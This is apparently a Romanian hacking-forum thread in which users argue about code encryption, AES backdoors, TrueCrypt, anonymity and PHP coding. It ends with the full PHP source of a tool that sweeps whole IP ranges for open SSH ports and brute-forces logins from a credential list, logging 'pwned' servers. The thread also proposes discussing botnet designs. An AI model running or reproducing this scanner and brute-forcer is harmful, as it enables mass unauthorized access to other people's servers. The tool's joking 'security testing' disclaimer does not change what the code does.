Irk

da-mi ban daca iti plac prostia si linistea, sefule

Nu am facut pan-acum decat critica constructiva si autorii n-au facut decat sa fasaie ca sifonul in loc sa ia notite si sa zica multumesc nenea. Daca chiar vroiai sa ajuti comunitatea de coderi php, din nou, il faceai in php5.3.5+ oop, il puneai pe github, lasai lumea sa faca fork si sa dezvolte mai departe. Codul ala-i mai mult de C decat de php, e plin de texte de cacat si nici nu prea isi face treaba. Acum e randul vostru. Invatati din ce zic sau va agitati mai departe, dar lumea merge inainte si merge pe calea despre care vorbesc eu aici.

1) am publicat deja sursa tot in threadul asta 2) am mentionat deja o metoda mai buna pentru multithreading in php.

s-au vazut si payloaduri mai destepte.

si mai e o faza cu criptarea codului (motiv pentru care l-am si decriptat, dealtfel): cum sa ai incredere ca nu-i ceva payload acolo?

misto sursa

zeus?

folositi guzzle, pentru ca nu mai suntem in anii 90.

Man. Daca exista un backdoor in AES, atunci e al americanilor.

da, e vorba de matematica destul de sf pentru majoritatea oamenilor. backdoorul e probabil direct in algoritmii de criptare

mai bine invata sa rulezi

"In July 2008, several TrueCrypt-secured hard drives were seized from Daniel Dantas, who was suspected of financial crimes. The Brazilian National Institute of Criminology (INC) tried for five months (without success) to obtain access to TrueCrypt-protected disks owned by the banker, after which they enlisted the help of the FBI. The FBI used dictionary attacks against Dantas' disks for over 12 months, but were still unable to decrypt them." Asta-i dovada ca truecrypt merge, dar e de-acum 4 ani si poate sa fie totul regizat pentru un plus de credibilitate.

Conceptul de class live nu e tocmai nou, se facea pe undernet tocmai pe #class acum ceva ani. Recent l-am vazut mai avansat pe irc.anonops.com, unde iti !alegi un tutorial si intra botul pe privat sa-ti turuie 10 minute sau asa. Good reading, dar nu la asta ma gandeam cand am deschis threadul, ci la o sectiune pentru discutii despre anonimitate. Partial si pentru ca E LA MODA. Paul4games nu ti-ai gasit omul, pentru ca-s de parere ca aes nu e sigur. Evident nu-s chei unice, dar probabil e decriptabil in timp real - in special de catre cia, sa zicem.

nu m-am gandit sa duc eu sectiunea asta in spate, pentru ca nu ma consider asa tatic, dar niste discutii constructive (din care sa invatam toti) poate chiar n-ar strica

ma intrebam daca vorbesc singur, de fapt.

Ma gandeam la - stickyuri cu tutoriale la zi despre anonimitate pentru toti nubii ca sa nu mai ajunga sa intre cu havij pe fmi.ro de pe ipul de-acasa, impresionati fiind de fratii nu mult mai intelepti de peste hotare - discutii despre steganografie (ascunderea datelor in imagini, streamuri, orice), tooluri, metode, studii de caz samd - criptografie, algoritmi, idei, paranoia legata de AES poate? - modele futuriste de botneturi si alte sisteme descentralizate bazate pe criptografie, teorie - activism: tooluri si sfaturi utile multilor romani care-ar vrea sa scrie si sa actioneze anonim pe net fara sa se pise antenele pe ei in timp ce ii fute jandarmeria in cur. Vad foarte multi copii dornici de faima si hiphop crestin pe-aici, asa ca nu stiu cat succes ar avea asa o sectiune, dar totusi ce ziceti?

Hackerii prinsi sunt prinsi pentru ca sunt mici, prosti, mandri, au gura mare si vorbesc rahat. Iar restul nu sunt prinsi.

sa o desfaci in bucati, sa vezi din ce-i facuta si sa o tunezi

multi is haiduci, scriu istoria si scriu ca tu o sa fii numit pe viitor labar sau, in cel mai bun caz, ignorant.

foloseste atunci functiile php pentru procesare de stringuri pe care le-am amintit mai sus

strpos, substr, preg_match, preg_match_all, etc. regexpal.com Iti recomand insa Guzzle ca si crawler (pentru ca suporta caching si requesturi paralele) si componenta symfony CssSelector pentru parsare de DOM. Poti sa le combini usor cu composer.

Php nu e multithreaded, de-aia se scriu scannerele in python sau ruby. O varianta pentru coderii de php care vor threaduri e extensia pcntl: PHP pcntl: Basic usage example. Cat despre protectia codului: daca nu acceptati ca aveti doar de invatat din open source, bafta. Eu unul caut intai cunostinte, abia apoi bani. Daca vreti sa discutam cod php pe viitor ne auzim pe github, pentru ca n-o sa-mi para mereu interesant sa va sparg criptarile copilaresti.

cum adica intelegi criptarea? ce-i aici, microsoft, apple? n-ar trebui sa ne ajutam si sa nu ascundem surse, mai ales pentru niste cod de 2 bani? atat zic.

big up shark0der. bogdannbv dar de cine ati ascuns voi sursa aia, copii?

<?php error_reporting(0); parse_str(implode('&', array_slice($argv, 1)), $_GET); $path = dirname(__FILE__); set_include_path("{$path}/libs/phpseclib"); require_once("Net/SSH2.php"); if (isset($_GET['-help'])) { credits(); help(); die(); } if (isset($_GET['-disclaimer'])) { disclaimer(); die(); } if (isset($_GET['a']) && !empty($_GET['a'])) { switch ($_GET['a']) { case("scan"): scan(); break; case("brute"): brute(); break; default: die("\n\nThere's no action with this name.\n\n"); } } else scan(); function scan() { if (isset($_GET['c']) && !empty($_GET['c'])) { $expl = explode(".", $_GET['c']); if (count($expl) == 2 && $expl[0] >= 1 && $expl[0] <= 255 && $expl[1] >= 1 && $expl[1] <= 255) { $start_time = start_time(); unset($expl); $good_ips = array(); $k = 0; $q = 0; for ($i = 0; $i <= 255; $i++) { for ($j = 0; $j <= 255; $j++) { $ip = "{$_GET['c']}.{$i}.{$j}"; if (fsockopen($ip, 22, $errno, $errstr, 0.2)) { write_good_ip($ip); $k++; } $q++; clear_wannabe(); credits(); echo "Current ip: {$ip} / {$_GET['c']}.255.255\n"; echo "Found: {$k}\n"; echo "Elapsed time: " . number_format(elapsed_time($start_time), 1) . " sec.\n"; echo "Done: " . number_format(percentage($q, 65536), 3) . "%\n"; } } die("\n\nI've found {$k} ip(s)\n\n"); } else { credits(); die("The class must be like \"192.168\", not like \"{$_GET['c']}\"\n\n"); } } else { credits(); die("You must specify an ip class like \"scanner.php c=192.168\"\n\n"); } } function brute() { $path = dirname(__FILE__); $ips = "{$path}/good_ips.txt"; $data = "{$path}/data.txt"; $ips = file_get_contents($ips); $data = file_get_contents($data); if (!empty($ips) && $ips != null && $ips != "\n") { if (!empty($data) && $data != null && $data != "\n") { $start_time = start_time(); $ips = explode("\n", $ips); unset($ips[count($ips) - 1]); $ips_count = count($ips); $data = explode("\n", $data); unset($data[count($data) - 1]); $data_count = count($data); $k = 0; $d = 0; $f = 0; foreach ($ips as $key => $ip) { $k++; foreach ($data as $key => $value) { $value = explode(" ", $value); $d++; $user = trim($value[0]); $pass = trim($value[1]); $ssh = new Net_SSH2($ip); if ($ssh->login($user, $pass)) { write_found($ip, $user, $pass); $f++; break; } clear_wannabe(); credits(); echo "Current ip: {$ip} ({$k}/{$ips_count})\n"; echo "Current data: {$user}:{$pass} ({$d}/{$data_count})\n"; echo "Found: {$f}\n"; echo "Elapsed time: " . number_format(elapsed_time($start_time), 1) . " sec.\n"; unset($ssh); } } die("\n\nI've found {$k} server(s)\n\n"); } else { credits(); die("It seems like there is no data in data.txt\n\n"); } } else { credits(); die("\n\nIt seems like there are no ips in good_ips.txt\n\n"); } } function write_found($ip, $user, $pass) { $path = dirname(__FILE__); $path = "{$path}/found.txt"; $f = file_get_contents($path); if (!strpos($f, $ip)) { $file = fopen($path, "a"); fwrite($file, "{$ip} {$user}:{$pass}\n"); fclose($file); } } function write_good_ip($ip) { $path = dirname(__FILE__); $path = "{$path}/good_ips.txt"; $f = file_get_contents($path); if (!strpos($f, $ip)) { $file = fopen($path, "a"); fwrite($file, "{$ip}\n"); fclose($file); } } function clear_wannabe() { for ($i = 0; $i <= 150; $i++) { echo "\n"; } } function percentage($what, $butt) { $return = ""; if ($what <= $butt) { $return = ($what / $butt) * 100; } else $return = "I said what what in the butt, in this case, the what is bigger than the butt :("; return $return; } function start_time() { $mtime = microtime(); $mtime = explode(" ", $mtime); $mtime = $mtime[1] + $mtime[0]; return $mtime; } function elapsed_time($start_time) { $mtime = microtime(); $mtime = explode(" ", $mtime); $mtime = $mtime[1] + $mtime[0]; return ($mtime - $start_time); } function help() { echo "+-------------------------------------------------------------+ \n"; echo "| | \n"; echo "| Help section :3 | \n"; echo "| | \n"; echo "| proudly brought to you by 2 noobs | \n"; echo "| | \n"; echo "| Example of a scan: | \n"; echo "| php scanner.php a=scan c=192.168 | \n"; echo "| | \n"; echo "| Example of a bruteforce against scanned results: | \n"; echo "| php scanner.php a=brute | \n"; echo "| | \n"; echo "| Generated files(so you won't have to be paranoid): | \n"; echo "| 1. good_ips.txt | \n"; echo "| 2. found.txt | \n"; echo "| File \"1\" contains the good ips list | \n"; echo "| File \"2\" contains pwned servers list | \n"; echo "| | \n"; echo "| May the r00t be with you! | \n"; echo "| (and don't forget to keep your pimp hand strong) | \n"; echo "| | \n"; echo "+-------------------------------------------------------------+ \n\n"; } function credits() { echo "\n\n"; echo "\t\t+-----------------------------+\n"; echo "\t\t| phP.I.M.P. Scanner |\n"; echo "\t\t| [v1.0] |\n"; echo "\t\t| |\n"; echo "\t\t| by bogdannbv & adonisslanic |\n"; echo "\t\t+-----------------------------+\n\n"; } function disclaimer() { echo "\n"; echo " ~~Disclaimer~~ \n"; echo "\n"; echo " WE DO NOT SUPPORT HACKING! \n"; echo "\n"; echo " THIS IS A SECURITY TESTING TOOL! \n"; echo "\n"; echo " THIS TOOL IS MENT TO BE USED ONLY ON YOUR OWN HOME NETWORK! \n"; echo "\n"; echo " DO NOT USE IT OUTSIDE YOUR NETWORK. \n"; echo "\n"; echo " IF YOU GET IN TROUBLE BY USING THIS TOOL IT IS JUST YOUR FAULT. \n"; echo "\n"; echo "WE ARE NOT RESPONSIBLE FOR ANY KIND OF DAMAGE THAT THIS TOOL MAY CAUSE. \n"; echo " *Possbile Damages : -cat bursting into flames; \n"; echo " -xmass tree's lights fail; \n"; echo " -getting robbed by an evil clown; \n"; echo " -no more puding left in the fridge ; \n"; echo "\n"; echo " USE THIS SOFTWARE ON YOUR OWN RISK, YOU'RE ON YOUR OWN!! \n"; echo "\n"; echo " WE ARE RESPONSIBLE FOR NOTHING! \n"; echo "\n"; }